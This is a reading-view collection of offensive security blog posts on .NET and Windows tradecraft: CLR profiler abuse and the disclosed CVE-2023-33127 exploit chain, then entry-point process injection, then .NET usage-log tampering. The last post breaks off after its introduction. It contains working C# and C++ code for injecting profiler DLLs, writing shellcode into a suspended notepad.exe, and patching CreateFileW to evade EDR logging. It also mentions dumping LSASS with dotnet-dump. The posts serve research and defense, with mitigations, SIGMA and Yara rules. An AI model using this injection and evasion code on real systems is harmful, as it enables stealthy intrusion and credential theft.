Reading view

There are new articles available, click to refresh the page.

Abusing .NET Core CLR Diagnostic Features (+ CVE-2023-33127)

Introduction

Background

.NET is an ecosystem of frameworks, runtimes, and languages for building and running a wide range of applications on a variety of platforms and devices. The .NET Framework was initially released in the early 2000s as Microsoft’s implementation of the Common Language Infrastructure (CLI) specification. In 2016, Microsoft released .NET Core, the first truly open-source, cross platform version of the .NET Platform.

All flavors of .NET rely on a runtime component called the Common Language Runtime (CLR). The CLR is responsible for executing managed programs (e.g. assemblies) and handling other tasks such as memory management, garbage collection, and just-in-time (JIT) compilation of manage-to-unmanaged code. In open-source .NET, the CLR is implemented as the Core CLR (e.g. coreclr.dll).

Although the .NET Framework will be referenced frequently, this blog will focus on abusing several runtime diagnostic features that are mostly specific to open-source .NET on modern Microsoft Windows client operating systems (e.g. .NET, formerly called .NET Core, since version 5).

Of note, the content provided in this blog was first presented in my MCTTP 2023 Conference talk – Dotnet: Not Dead…Yet. Defensive considerations, SIGMA rules, and mitigation guidance are located at the end of the post.

.NET Native Inclusion

Although it may be a surprise to a few, .NET Framework (4.8.x) is still the default “system wide” .NET implementation on Microsoft Windows. However, Windows ships with several Universal Windows Platform (UWP) applications (“apps”) that rely on .NET Native, a .NET pre-compilation technology that contains an instance of the Core CLR runtime. An example UWP app that leverages .NET Native is the Phone Link app (PhoneExperienceHost.exe).

Note: Visual Studio components and Azure DevOps Pipeline Agents leverage the open-source .NET runtime. Most recently, .NET version 8 was released.

Runtime Configuration & Diagnostics

Over the last few years, I’ve blogged about several ways to abuse the .NET Framework by leveraging CLR Configuration Knobs. Adjusting knobs allow for controlling the behavior of the .NET Common Language Runtime (CLR) for development, debugging, and diagnostic purposes. The Core CLR is no exception and includes many similar and unique knobs that can be configured in the registry, environment variables, and configuration files.

A very interesting and well supported diagnostic extension for the .NET Framework CLR is the profiling API. As stated by Microsoft, a profiler is a “tool that monitors the execution of another application. [It] is a dynamic link library (DLL) that consists of functions that receive messages from, and send messages to, the CLR by using the profiling API. The profiler DLL is loaded by the CLR at run time.” Messaging to and from the profiler DLL and the CLR are implemented through the ICorProfilerCallback/2 interface for event notification and the ICorProfilerInfo/2 interface for profiled application state information. Profiling a .NET application could reveal event(ing) information such as assembly loading, module loading, and thread creation (Source: Microsoft Docs).

Interestingly, open-source .NET includes a rich set of troubleshooting diagnostic features, tools, and APIs that can be leveraged to interface with the Core CLR without the need of a profiler, though profiling is also supported (which we’ll dive into shortly). Of note, Microsoft documentation for Core runtime diagnostics is very robust and well worth reviewing.

CLR Profiler Abuse

.NET Framework CLR Profiler Loading

At .NET application start, configuration knobs adjust the CLR/runtime behavior. As documented by Casey Smith (@subTee) in 2017, the following .NET Framework profiler knobs are configured as environment variables to load an unmanaged “profiler” DLL:

  • COR_ENABLE_PROFILING – Set to 1 to enable profiler loading
  • COR_PROFILER – Set a target CLSID or arbitrary GUID value (Note: Not necessarily required for the .NET Framework)
  • COR_PROFILER_PATH – Set path to the profiler DLL

If an arbitrary DLL is loaded into the CLR that does not meet the requirements and structure for a profiler DLL, the CLR will effectively unload the library. Depending on the offensive use case, this may or may not be important. Additionally, this technique is documented in Mitre ATT&CK as sub-technique: T1574.012.

.NET Core CLR Profiler Loading

The Core CLR profiler in open-source .NET acts in a similar way but leverages the following knobs to load a “profiler” DLL:

  • CORECLR_ENABLE_PROFILING – Set to 1 to enable profiler loading
  • CORECLR_PROFILER – Set an arbitrary GUID value (Note: Required for open-source .NET)
  • CORECLR_PROFILER_PATH – Set path to the profiler DLL (Note: knob names may also be CORECLR_PROFILER_PATH_32 or CORECLR_PROFILER_PATH_64 depending on architecture)

When set as environment variables in the registry, the .NET application Core CLR loads the DLL for execution and persistence:

.NET Core CLR Diagnostics

CLR Diagnostic Port

As mentioned prior, the .NET Core CLR diagnostic analysis can be performed without the use of a CLR profiler. By default, the Core CLR enables an Interprocess Communication (IPC) diagnostic endpoint called a diagnostic port. On Linux and MAC, the IPC occurs over Unix domain sockets by default. On Windows, IPC occurs over a named pipe, which follows this naming convention:

\.\pipe\dotnet-diagnostic-{Process ID (PID) of .NET application}

Diagnostic applications interface and communicate with a target application’s CLR diagnostic port to send commands and receive responses. Graciously, Microsoft has released a suite of diagnostic tools and an API for interfacing with the diagnostic port.

Diagnostic Applications & Tools

The following Microsoft signed command line applications are available to diagnose .NET application issues:

  • dotnet-counters
  • dotnet-dump
  • dotnet-monitor
  • dotnet-trace
  • …and more

As you can imagine, some of these utilities can be used for living-off-the-land/lolbin scenarios. For instance, dotnet-dump instructs the CLR of a target .NET application to dump its process memory. Dotnet-dump also implements MiniDumpWriteDump, which can be used to create process minidumps of non-.NET processes (e.g. such as LSASS):

Diagnostic API

Although command-line diagnostic tools provide a turnkey approach for diagnosing .NET applications, Microsoft makes available the Microsoft.Diagnostics.NETCore.Client API to interact with the diagnostic port of .NET applications for deeper use cases. The API is relatively straight forward to use and includes a diagnostic class and several methods for:

  • Setting environment variables
  • Dumping the .NET process
  • Setting a startup CLR profiler
  • Attaching a CLR profiler…

Interestingly, a “monitoring” application can leverage API diagnostic port to instruct the target application CLR to attach a profiler. Leveraging the API, the following C# code snippet serves as “injector” to load a “profiler” DLL into a running process using the AttachProfiler() method:

using Microsoft.Diagnostics.NETCore.Client;

class profiler_injector
{
    static void Main(string[] args)
    {
        int pid = Int32.Parse(args[0]);
        string profilerPath = args[1];

        AttachProfiler(pid, Guid.NewGuid(), profilerPath);
    }

    static void AttachProfiler(int processId, Guid profilerGuid, string profilerPath)
    {
        var client = new DiagnosticsClient(processId);
        client.AttachProfiler(TimeSpan.FromSeconds(10), profilerGuid, profilerPath);
    }
}

Expectedly, running the injector programs shows a successful result:

IPC Messaging Protocol

The Diagnostic IPC Protocol is used for client (“monitoring application”) and server (target application CLR) messaging over the diagnostic port named pipe. Microsoft provides excellent documentation of the transport, structure, and commands. Leveraging the IONinja protocol analyzer, an example client request and server response for issuing the AttachProfiler command appears as follows:

The “magic” string value effectively serves as the message header, and it has a 14-byte reservation. As of this blog release date, the constant magic value is “DOTNET_IPC_V1”. The following two bytes are reserved for the payload size, and the next two bytes are reserved for the command code.

For the client message, 0x0301 is the identifier for the AttachProfiler command. The next two bytes are generally reserved, and the remainder of the message is the payload. In this case, the client payload data includes the attachment timeout value, a CLSID/GUID value (e.g. for the CORECLR_PROFILER), and the path to the profiler DLL (e.g. for CORECLR_PROFILER_PATH). The remaining bytes are not set, but other messages may contain a client data element.

For this example, the command code in the server response (0xFFFF) is interesting. Although the “profiler” DLL successfully attaches, the command code indicates an error with the DLL since it is not a true profiler DLL. In this case, the DLL does not adhere to the expected structure and is evicted.

Note: With insight into the messaging protocol, one could go a step further and forgo managed API usage and craft diagnostic IPC messages at the byte-code level.

CVE-2023-33127: .NET Cross Session Local Privilege Escalation

Motivation

Every now and again, researching offensive tradecraft opens the door for thinking of new ways to exploit potential vulnerabilities. The CLR diagnostic attack surface was interesting, especially with the capabilities provided by the CLR and use of named pipes for IPC endpoint. Initially, I did not identify any formal services operating in a privileged context (e.g. NT AUTHORITY\SYSTEM) that leveraged .NET Core. Eventually, I found a few third-party services as well as use within Azure pipelines, but the UWP apps were all I had to work with at the time. I noted two possible use cases for privilege elevation:

  • An observation was made that some UWP apps operated in low integrity. There may be a scenario to potentially elevate from low to medium integrity within a user session.
  • Other UWP apps operate at medium integrity. UWP processes are created for each user logged into a machine. It may be possible to influence the UWP application diagnostic port that is created in another user’s session.

I opted to start with the latter as I always found cross-session attacks to be very interesting.

Discovery Methodology

Having already spent too many unhealthy years looking at Component Object Model (COM) and following the incredible research of James Forshaw (@tiraniddo), it was most natural place to look for cross-session attack opportunities. It is no secret that users can activate DCOM objects in other interactive sessions. This includes a scenario when a non-privileged users is logged into the same machine as a privileged user.

Cross session activation is made possible when the identity of the target DCOM object is set to run as the “interactive user” (e.g. the interactive user in the target session), and the activation and launch permissions permit the object activation to occur by the launching user (e.g. the attacker).

Note: Even if DCOM security settings permit object activation in another session, it does not necessarily mean the launching user has the permissions to access and use the activated object. Regardless, activation is all that is required for this use case.

Fortunately for us, James developed and released OleViewDotNet, which makes discovering and analyzing COM objects much easier and quicker. After narrowing down COM objects configured to run as the “interactive user”, I discovered that the Phone Link UWP application (PhoneExperienceHost.exe) was also a DCOM server:

After some basic testing, two key elements came to fruition:

  • As an out-of-process DCOM server, associated DCOM class objects would launch the PhoneExperienceHost.exe executable (including all .NET components).
  • A lower privileged user could most certainly activate several associated DCOM objects in a privileged user session on Windows 10 (e.g. CLSID – 7540C300-BE9B-4C0D-A335-F002F9AB73B7).

Although a potential premise was set for cross-session attack, there was still the problem of lacking a core exploitation vector. There are several ways to approach this problem, and I thought about investigating a few of those potential vectors, but I focused on the diagnostic port named pipe. There are interesting exploitation primitives that could potentially be leveraged to attack named pipes as discussed in this fantastic blog post by @0xcsandker.

Albeit an obvious statement – one of the best things about open-source software is that the source code is made publicly available, so there is a time advantage for not having to reverse engineer part of the .NET runtime and/or dive too deeply into the internals (although it is not a bad idea). As such, I decided to search through the .NET runtime source code on GitHub and analyze the diagnostic port implementation. Here is the C code used to create the named pipe with CreateNamedPipeA (prior to patching):

Named pipes are FIFO structures – the first named pipe server instance has precedence to respond to client requests if multiple named pipes with the same name exist. Furthermore, subsequent named pipes inherit the handle security descriptor of the first named pipe when created, including the DACL and ownership. However, if the FILE_FLAG_FIRST_PIPE_INSTANCE flag is specified within the openmode parameter, the subsequent named pipe will not be created, and inheritance will be thwarted.

Interestingly, the FILE_FLAG_FIRST_PIPE_INSTANCE flag is not specified when creating the diagnostic port named pipe. This means that the named pipe will still be created even if another pipe with the same name already exists. In short, if an attacker creates a crafted named pipe before the Core CLR creates a diagnostic port with the same name, the attacker has the ability to control the diagnostic endpoint and issue commands from another session because the attacker owns the named pipe handle and security descriptor. To successfully exploit this condition, the attacker must figure out a way to create the malicious named pipe prior to the .NET application CLR runtime creating the legitimate named pipe of the same name.

Note: In my recorded MCTTP conference talk, I misspoke about the inclusion of the PIPE_UNLIMITED_INSTANCES flag when it should have been about the exclusion of the FILE_FLAG_FIRST_PIPE_INSTANCE flag. Please execute this error if you decide to watch the recorded talk.

Now, let’s recall the naming convention for the diagnostic port named pipe:

\.\pipe\dotnet-diagnostic-{Process ID (PID) of .NET application}

Although the named pipe is mostly static, the suffix mirrors the process identifier of the running .NET application. As a result, there are three challenges to overcome for successful exploitation:

  1. Beat a race condition and create the tampered named pipe before the target .NET application.
  2. Figure out a continuous way to spawn the target process until a named pipe match is made.
  3. And finally, deliver a payload…

Exploitation Walkthrough

Fortunately, all of the challenges can be addressed programmatically with the required conditions in place. First order of business was to address the race condition, which in many ways is out of our control, so my solution was to optimize coverage and leverage a “spray and pray” technique. For a proof-of-concept, I opted to create thousands of weakly permissive named pipes conforming to the diagnostic port convention. After a restart, there was a likelihood of low-ordered PID creation for newly spawned target application processes, which slightly increased the chance of hitting the covered named pipes. In reality, this approach was not as practical as just accounting for different ranges of PIDs and maintaining a sense of realism (e.g. no reboot in the real world with multiple sessions). In the end, the best option was just to simply increase the number of tampered named pipes for getting a quicker match.

Next, the issue of continuous COM activation. Interestingly enough, activating a cross-session DCOM object is quite easy through the use of a Session Moniker:

Format: Session:[session id]!clsid:[class id]

I opted to continuously activate target DCOM object in an infinite loop. A sleep delay was added to ensure that the same, previously activated object was not re-used so that a new out-of-process server in the target session was spawned to increase the chance of a match.

Lastly, I needed a payload delivery vector. This was the best part – simply re-using the AttachProfiler capability to deliver a malicious DLL payload worked like a charm after cleaning up the malicious named pipe.

Demonstration

Here is a screenshot of the exploit in action:

Once the .NET target process created the diagnostic port named pipe after a match, the handle inherited weak DACL permissions and ownership from the tampered named pipe:

Upon successful tampering, the exploit sends the AttachProfiler command to the target .NET application diagnostic endpoint and instructs the CLR to load the payload DLL to achieve cross-session code execution:

Mitigation & Disclosure Timeline

  • 03/2023 – Initial report submitted to MSRC
  • 04/2023 – Acknowledgement of vulnerability and patch development
  • 06/2023 – Unofficially, Microsoft appeared to address launch and activation permissions for the impacted DCOM objects
  • 07/2023 – Official patch released (in .NET) by Microsoft
  • 09/2023 – Bug initially disclosed at the 2023 MCTTP conference

Defensive Considerations

  • To protect against CVE-2023-33127 cross-session privilege escalation, upgrade .NET dependency components to the latest version. The patch was officially addressed in July 2023.
  • To prevent the .NET Core CLR diagnostic port from loading at all, set persistent environment variables at all applicable levels with the following configuration knob:
DOTNET_EnableDiagnostics=0
  • To detect possible dotnet-dump.exe lolbin abuse, consider implementing the following SIGMA rule authored by Nasreddine Bencherchali (@nas_bench): proc_creation_win_lolbin_dotnet_dump
  • To detect possible Environment Variable CoreCLR profiler abuse, consider implementing the following updated SIGMA rule originally authored by Jose Rodriguez (@Cyb3rPandaH): registry_set_enabling_cor_profiler_env_variables
  • Understanding .NET telemetry sources are important for collecting events and building robust detections. Telemetry Layering by Jonny Johnson (@jsecurity101) is a great resource that dives into the concept. As such, consider leveraging .NET (Core) diagnostic capabilities to aid in telemetry collection if feasible for your use cases. Monitor for interesting and opportunistic CLR events (e.g. profiler attachment) in addition to other interesting events such as .NET assembly loads.

Conclusion

.NET presents an interesting and opportunistic attack surface. In this post, we focused on Windows techniques, but there are certainly use cases that may extend to or present unique opportunities on other platforms and operating systems.

As always, thank you for taking the time to read this post and happy hunting!

-bohops

No Alloc, No Problem: Leveraging Program Entry Points for Process Injection

Introduction

Process Injection is a popular technique used by Red Teams and threat actors for defense evasion, privilege escalation, and other interesting use cases. At the time of this publishing, MITRE ATT&CK includes 12 (remote) process injection sub-techniques. Of course, there are numerous other examples as well as various and sundry derivatives.

Recently, I was researching remote process injection and looking for a few under-the-radar techniques that were either not documented well and/or contained minimalist core requirements for functionality. Although the classic recipe of VirtualAllocEx() -> WriteProcessMemory() -> CreateRemoteThread() is a stable option, there is just way too much scrutiny by EDR products to effectively use such a combination in a minimalist fashion.

In this post, we’ll explore a couple of entry point process injection techniques that do not require explicit memory allocation or direct use of methods that create threads or manipulate thread contexts.

AddressOfEntryPoint Process Injection

Repeat after me: when in doubt, go to Red Team Notes for a solution. This is where I came across this great write-up by @spotheplanet that showcases how to leverage the AddressOfEntryPoint relative virtual address for code injection.

When a Portable Executable (PE) is loaded into memory, the AddressOfEntryPoint is the address of the entry point relative to the image base (Microsoft Learn). In a PE exe file/image, the AddressOfEntryPoint field is located in the Optional Header:


Abusing the AddressOfEntryPoint field is not an entirely new concept. Although not always functional in implementation, the AddressOfEntryPoint field can be stomped and overwritten with shellcode in an arbitrary PE file to load the injected shellcode at program start (as demonstrated here). Interestingly, the technique is also achievable in the context of a remote process.

When a process is created, the first two modules loaded into memory are the program image and ntdll.dll. When a process is created in a suspended state, the only two modules loaded are the program image and ntdll.dll:


Essentially, the Operating System does just enough bootstrapping to load the bare essentials, however, the AddressOfEntryPoint is not yet called to begin formal program execution. So, you may be asking…how does one find the AddressOfEntryPoint in a suspended process to inject code?

Following the Red Team Notes write-up, the process is summarized as follows:

  • Obtain the target image PEB address and pointer to the image base of the remote process via NtQueryInformationProcess().
  • Obtain the target process image base address as derived from the PEB offset via ReadProcessMemory().
  • Read and capture the target process image headers via ReadProcessMemory().
  • Get a pointer to the AddressOfEntryPoint address within the target process optional header
  • Overwrite the AddressOfEntryPoint with desired shellcode via WriteProcessMemory()
  • Resume the process (primary thread) from a suspended state via ResumeThread()

Using the sample code provided, our shellcode is successfully injected and executed in the remote process:

Note: For a 64-bit code example of this technique, check out this GitHub project by Tim White.

ThreadQuery’ Process Injection

Maybe not as well known as NtQueryInformationProcess(), a similar-in-name method exported from ntdll.dll is NtQueryInformationThread():


While reading the Microsoft documentation for this function, a statement in the ThreadInformationClass parameter section stuck out:

“If this parameter is the ThreadQuerySetWin32StartAddress value of the THREADINFOCLASS enumeration, the function returns the start address of the thread”

Microsoft Docs


Although very interesting, information about the THREADINFOCLASS enum was not readily accessible on the Microsoft site. However, a quick Google search leads us to the ProcessHacker GitHub repo page containing a definition for the enum:


As shown in the previous image, a lot of information can be pulled from THREADINFOCLASS. For our purposes, we are most interested in obtaining a pointer to ThreadQuerySetWin32StartAddress. If we take what we already know about a suspended state process, the program entry point address has not been called (yet). So, any process thread address information that is obtained from ThreadQuerySetWin32StartAddress when querying for the primary process thread is likely going to be the address of the program entry point. Let’s explore this assumption…

First, we must figure out how to actually obtain a handle to the primary process thread. Fortunately, this is quite trivial since we start the process with CreateProcess(). The information is readily available as a pointer to the PROCESS_INFORMATION structure. Conveniently, Microsoft states:

[PROCESS_INFORMATION] contains information about a newly created process and its primary thread. It is used with the CreateProcess, CreateProcessAsUser, CreateProcessWithLogonW, or CreateProcessWithTokenW function.

Microsoft Docs


As such, we use NtQueryInformationProcess() to obtain a function pointer to the ThreadQuerySetWin32StartAddress (which is also represented as numerical value 0x09 in the THREADINFOCLASS enum).

Next, we write our shellcode to the address of ThreadQuerySetWin32StartAddress with WriteProcessMemory() and leverage ResumeThread() to resume the thread for launching the shellcode.

Putting it all together, this simple C++ program should accomplish the task (targeting notepad.exe):

#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")

int main()
{
    // Embed our shellcode bytes
    unsigned char shellcode[]{ 0x56,0x48,0x89, ... };

    // Start target process
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    CreateProcessA(0, (LPSTR)"c:\\windows\\system32\\notepad.exe", 0, 0, 0, CREATE_SUSPENDED, 0, 0, &si, &pi);

    // Get memory address of primary thread
    ULONG64 threadAddr = 0;
    ULONG retlen = 0;
    NtQueryInformationThread(pi.hThread, (THREADINFOCLASS)9, &threadAddr, sizeof(PVOID), &retlen);
    printf("Found primary thread start address: %I64x\n", threadAddr);

    // Overwrite memory address of thread with our shellcode
    WriteProcessMemory(pi.hProcess, (LPVOID)threadAddr, shellcode, sizeof(shellcode), NULL);

    // Resume primary thread to execute shellcode
    ResumeThread(pi.hThread);

   return 0;
}

Once we compile and run the application, it appears everything works as intended.


Before declaring victory, let’s modify our code slightly and analyze the program operation to validate (or debunk) our initial assumption…

ThreadQuerySetWin32StartAddress Analysis

First, we comment out the ResumeThread() call in the program, recompile, and run. This of course, creates the target (notepad.exe) process in a suspended state. We will resume the process in a manual fashion when necessary.

In our program output, NtQueryInformationThread() returns a memory address of 0x7ff6a0ff3f40 when querying for ThreadQuerySetWin32StartAddress:

Analyzing the suspended process in ProcessHacker, we see a single thread pointing to a start address of 0x7ffdaf6a2680.


Once we attach the x64dbg debugger to the suspended program, the program state resumes but the single thread remains suspended. The instruction pointer currently points to the start address of the single thread for execution of the ntdll:RtlUserThreadStart() function.


For clarity, the currently suspended thread is not the primary program thread. Furthermore, the call to RtlUserThreadStart() is actually a part of the initial process start-up and initialization routine.

Moving forward, we manually resume the suspended thread to continue through the remainder of the process initialization, and then add a breakpoint in the debugger for the ThreadQuerySetWin32StartAddress returned memory address (0x7ff6a0ff3f40). When we run the application, the breakpoint hits on the resolved program entry point address:


Stepping through the remainder of the program, the shellcode is successfully executed:

*Note: Overwriting the entry point may result in unstable program functionality (e.g. if the shellcode is large).

Defensive Considerations

  • While taking a look at the stack threads, I noticed an interesting method call for _report_securityfailure. This is a feature of VTGuard which “detects an invalid virtual function table which can occur if an exploit is trying to control execution flow via a controlled C++ object in memory”.

    Tracing for such stack events and correlating with System/Application/Security-Mitigations Event Log errors may provide an interesting detection opportunity (Please reach out if you have more information on this!)

  • The following POC Yara rule may be useful for identifying suspicious PE files that leverage methods associated with entry point process injection:
import "pe"

rule Identify_EntryPoint_Process_Injection
{
    meta:
        author = "@bohops"
        description = "Identify suspicious methods in PE files that may be used for entry point process injection"
    strings:
        $a = "CreateProcess"
        $b = "WriteProcessMemory"
        $c = "NtWriteVirtualMemory"
        $d = "ResumeThread"
        $e = "NtQueryInformationThread"
        $f = "NtQueryInformationProcess"

    condition:
        pe.is_pe and $a and ($b or $c) and $d and ($e or $f)
}

Conclusion

As always, thank you for taking the time to read this post.

-bohops

Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion (Part 2)

Introduction

Last year, I blogged about Investigating .NET CLR Usage Log Tampering Techniques For EDR Evasion. In that part 1 post, we covered:

  • The purpose of .NET Usage Logs and when they are created
  • How Usage Logs are used to detect suspicious activity
  • Several mechanisms for tampering with Usage Logs to avoid log creation and subsequent detection
  • Defensive considerations for potentially detecting nefarious activity around .NET and Usage Log tampering.

Recently, I revisited the research topic to close the loop on some outstanding research and figured I would share. In this post, we’ll recap .NET Usage Logs, highlight two other tampering techniques, and review defensive considerations.

A Recap of .NET Usage Logs

When .NET applications are executed or when assemblies are injected into another process memory space (by the Red Team), the .NET Runtime is loaded to facilitate execution of the assembly code and to handle various and sundry .NET management tasks. One task, as initiated by the CLR (crl.dll), is to create a Usage Log file named after the executing process once the assembly is finished executing for the first time in the (user) session context. This log file contains .NET assembly module data, and its purpose serves as an information file for .NET native image autogeneration (auto-NGEN).

There are several directories dedicated for Usage Log creation depending on the .NET user context, the .NET version, or other specialty caveats such as a specialty application (e.g. Office/Store/etc.). A few examples include:

  • 64-bit .NET 4.0, User-Level: \Users\<user>\AppData\Local\Microsoft\CLR_v4.0\UsageLogs
  • 32-bit .NET 4.0, User-Level: \Users\<user>\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs
  • 64-bit .NET 4.0, System-Level: \Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0
  • 32-bit .NET, 4.0 System-Level: \Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32

Prior to process exit, the CLR typically writes to one of the aforementioned file paths if a log file does not already exist in the target directory. For instance, we can see that the powershell.exe.log Usage Log is created for the first time just prior to ‘gracefully’ terminating the powershell.exe process:

Monitoring Usage Log file creation events provide detection opportunities for identifying suspicious and/or unlikely processes that have loaded the .NET CLR.

Tampering Technique: Discretionary ACL Block

A low-effort, yet effective way to prevent the Usage Log write operation is by setting an Access Control List (ACL) entry on the target \UsageLogs directory. As an example, let’s target a user context named ‘user’ who runs a 64-bit .NET application.

First, let’s check the existing ACL on the \UsageLogs directory. This can be obtained with the get-acl PowerShell cmdlet:

get-acl c:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ |fl

As expected, ‘user’ has Allow-Full Control permission over the \UsageLogs folder in their respective home directory structure. Let’s use the following slightly modified C# code from Microsoft Docs to set a deny ACL entry on the \UsageLogs directory for ‘user’ using the AddAccessRule() method from the System.Security.AccessControl namespace:

using System;
using System.IO;
using System.Security.AccessControl;

namespace FileSystemExample
{
    class DirectoryExample
    {
        public static void Main()
        {
            try
            {
                Console.WriteLine("Hello World!");

                //Set Deny ACL for "user"
                DirectoryInfo dInfo = new DirectoryInfo(@"C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\");
                DirectorySecurity dSecurity = dInfo.GetAccessControl();
                dSecurity.AddAccessRule(new FileSystemAccessRule(@"WIN-FLARE\user", FileSystemRights.FullControl, AccessControlType.Deny));
                dInfo.SetAccessControl(dSecurity);
            }
            catch (Exception e)
            {
                Console.WriteLine(e);
            }
        }
    }
}

After the application runs, the deny entry is added to the ACL:

Although the Allow-FullControl entry is still present, the Deny-FullControl entry takes precedence and prevents the creation of the Usage Log as well as access to the \UsageLogs directory in this case:

Note: This technique likely requires out-of-band cleanup when finished.

Tampering Technique: Inline Hooking

An interesting technique for dismantling user mode security features is hooking a target function and disrupting program flow in memory. Great examples of this include evading ETW by disrupting the EtwEventWrite() function in Kernel32.dll (thanks @_xpn_) and evading AMSI by patching the AmsiScanBuffer() in amsi.dll (thanks @_xpn_ and @_RastaMouse). Similarly, might we be able to use a technique for tampering with the .NET Usage Log creation events? If we fire up Procmon and inspect our .NET program trace, we can drill down to see the series of events that occur when the Usage Log is created for first time program execution:

Procmon gives us insight into the operation performed, and not surprisingly, we can see that the CreateFile operation (using CreateFileW()) is used to open the handle to create the target Usage Log file as shown in this partial stack trace:

It would seem that simply patching CreateFileW() in KernelBase.dll may prevent Usage Log creation and that is what we should just try it, right? Before exploring that possibility, let’s consider a few caveats and tradeoffs before proceeding:

  • Patch Timeliness: Whereas patching enabling security functions (e.g. ETW/AMSI) may make sense to do so earlier in program execution flow, patching CreateFileW() early may have adverse impact on the running program since such calls are made frequently during the process lifetime. As you may recall from the previous post, the Usage Log call to initiate the log creation process occurs during process shutdown as initiated by the CLR (which is also noted in the process trace above). As such, patching should occur near process exit.
  • Process Exit: .NET tradecraft varies between Command & Control (C2) frameworks, custom tooling/usage, etc. In many cases, the end of process execution is also the end of executing .NET assembly modules, so patching CreateFileW() near process end would generally work in these cases. However, if assemblies are executed inline, patching CreateFileW() may prove risky for the lifetime of the running process.
  • Patch Function Selection: Patching CreateFileW() may seem like the most obvious choice. However, inline hooking other candidate functions just might achieve the same effect.

Now, let’s assume that we would like to move forward with patching because it meets the use case requirements, so we open our target 64-bit .NET program in the x64dbg debugger to find lead information that may help us leverage a suitable (set of) patch instructions. First, we set a breakpoint on CreateFileW() and step through until find the instruction of interest in the disassembler. In this case, it is a JMP to KernelBase:CreateFileW:

At this point, we see that RCX register holds a memory address for the first parameter in CreateFileW(), which is the file path pointer for the target Usage Log:

Next, we step into the function and work our way through the instructions. To highlight, we observe several operations within KernelBase:CreateFileW() but no instructions that seem to manipulate RCX. However, we do see a call to the internal KernelBase:CreateFileInternal() function, which was evident in our earlier Procmon stack trace (as seen above).

Interestingly, we finally observe RCX manipulated in the disassembler after stepping into KernelBase:CreateFileInternal():

A quick Google search does not reveal official documentation about KernelBase:CreateFileInternal(). It is not an export of Kernel32 or KernelBase, so it definitely is an internal function. The best information found is a reference in this blog post by James Forshaw. For our use case, however, we are at a point where we may be adventuring down the proverbial rabbit hole, so analyzing the heavy lifting subsequently performed with CreateFileInternal() to work through the magical calls of all the *CreateFile* chains in user and kernel mode are beyond the scope of this post (but a good exercise nonetheless).

So, let’s get back on track, step out of CreateFileInternal() and back into CreateFileW(). Here, we observe the we are near the end of our CreateFileW() call as we approach the return (RET) instruction. Conveniently, this appears to be all that we need as it takes us back to the CLR after CreateFileW() is finished:

And after all that, let’s simply patch CreateFileW() with the return op code (0xC3) in the following C# code example:

using System;
using System.Runtime.InteropServices;

namespace MyVeryEvilTestAssembly
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Hellow World");

            //Placed at the end of our program for good measure
            EvadeUsageLogDetections();
        }

        static void EvadeUsageLogDetections()
        {
            byte[] patch = new byte[] { 0xC3 }; //Patch with ret code
            IntPtr kernel32 = LoadLibrary("KernelBase.dll"); //We should be able to use Kernel32.dll as well
            IntPtr createFileAddr = GetProcAddress(kernel32, "CreateFileW");
            VirtualProtect(createFileAddr, (UIntPtr)patch.Length, 0x40, out uint oldProtect);
            Marshal.Copy(patch, 0, createFileAddr, patch.Length);
            VirtualProtect(createFileAddr, (UIntPtr)patch.Length, oldProtect, out oldProtect);
        }

        [DllImport("kernel32")]
        public static extern IntPtr GetProcAddress(IntPtr hModule, string plpProcName2);

        [DllImport("kernel32")]
        public static extern IntPtr LoadLibrary(string lpLibFileName);

        [DllImport("kernel32")]
        public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint pflOldProtect);
    }
}

After analyzing our program once more in the debugger after the program change, we can see the return opcode patch applied, and the CreateFile operation is completely thwarted for Usage Log creation:

And that is just one patch option. There probably better ways to handle last error(s) 😉

Usage Log Defensive Considerations

Last year, I reported this issue to MSRC, and they concluded that Usage Log evasion was not a security boundary issue. However, the security takeaways in the previous post and this post are relevant:

*Monitor for \UsageLog directory ACL changes (via Event Log): Ensure the “Audit Object Access” setting is enabled (for success and failure) in the System Audit Policy or the “Audit File System” setting is enabled in the Advanced Audit Policy Configuration.

Set auditing on the the \UsageLog directories that should be monitored including the security principal (e.g. everyone). In Advanced settings, select “Change permissions”, ensure success is checked (at least), and apply.

Monitor for Event ID 4670 to detect DACL changes (per this source) An example event looks like this:

*Continue monitoring Usage Log creation and deletion events: Creation of log files for unmanaged processes that load the CLR and really have no business doing so should be treated as suspicious, especially those pesky script hosts.  Offensive operators will not always account for Usage Log tampering while executing their .NET tools when using commands like execute-assembly in Beacon. Keep in mind that some unmanaged processes legitimately load the CLR depending on the use case, such as mmc.exe. Usage Log deletion events could be an indicator of compromise if an actor tries to clean up rather than deploy an evasion technique.

*Continue monitoring for suspicious .NET runtime loads: Where as monitoring log file creation event for detection could be hit or miss, monitoring for suspicious .NET CLR loads (e.g. clr.dll, mscoree.dll, etc.) could yield interesting results when tuned correctly.

*Continue hunting for CLR configuration knob additions or modifications: The addition of the NGenAssemblyUsageLog string in the HKCU\Software\Microsoft\.NETFramework and HKLM\Software\Microsoft\.NETFramework Registry keys could be an indicator of compromise. Hunt for the prepending of COMPlus_NGenAssemblyUsageLog in permanent user/system environment variables. Event ID 4657 is generated when the audit object access policy is enabled and the target key is audited for key write/set value events (thanks @Cyb3rWard0g):

*Continue hunting for suspicious process events: Identifying early process termination and DLL unload events may be interesting in the context of detecting Usage Log evasion techniques.

Conclusion

And that’s a wrap., Thank you for taking the time to read this post. Feel free to send me a DM if you discover any other evasion techniques!

-bohops

Unmanaged Code Execution with .NET Dynamic PInvoke

Yes, you read that correctly – “Dynamic Pinvoke” as in “Dynamic Platform Invoke”

Background

Recently, I was browsing through Microsoft documentation and other blogs to gain a better understanding of .NET dynamic types and objects. I’ve always found the topic very interesting mainly due to its relative obscurity and the offensive opportunities for defensive evasion. In this post, we’ll briefly explore ‘classic’ PInvoke (P/Invoke), discuss its inherent limitations, and introduce a lightweight technique (Dynamic PInvoke) that lets us call and execute native code in a slightly different way from managed code.

Notes & Caveats

  • In this post, .NET loosely refers to modern versions of the .NET Framework (4+). Other versions of .NET runtimes (e.g. Core) may be relevant.
